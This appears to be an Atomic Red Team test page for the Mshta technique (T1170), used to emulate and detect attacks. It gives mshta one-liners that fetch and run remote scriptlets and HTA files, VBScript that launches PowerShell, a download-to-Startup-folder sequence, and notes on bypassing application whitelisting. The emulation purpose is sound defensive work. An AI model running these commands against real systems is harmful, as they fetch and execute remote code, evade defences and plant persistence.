T1170.md

T1170 - Mshta

Description from ATT&CK

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

Atomic Tests

• Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject

• Atomic Test #2 - Mshta calls a local VBScript file to launch notepad.exe

• Atomic Test #3 - Mshta executes VBScript to execute malicious command

• Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)

Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject

Test execution of a remote script using mshta.exe

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
file_url	location of the payload	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct

Attack Commands: Run with command_prompt!

mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();

Atomic Test #2 - Mshta calls a local VBScript file to launch notepad.exe

Tests execution of a local program by a VBScript file called by Mshta Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
local_file	Create a local VBScript file	path	C:\Temp\mshta_notepad.vbs

Attack Commands: Run with command_prompt!

mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""{local_file_path}"")(window.close)")

Atomic Test #3 - Mshta executes VBScript to execute malicious command

Run a local VB script to run local user enumeration powershell command

This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.

Supported Platforms: Windows

Attack Commands: Run with command_prompt!

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")

Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)

Execute an arbitrary remote HTA.

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
hta_url	URL to HTA file for execution	string	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta
temp_file	temp_file location for hta	string	$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1170.hta

Attack Commands: Run with powershell!

$var =Invoke-WebRequest "#{hta_url}"
$var.content|out-file "#{temp_file}"
mshta "#{temp_file}"

Cleanup Commands:

remove-item "#{temp_file}" -ErrorAction Ignore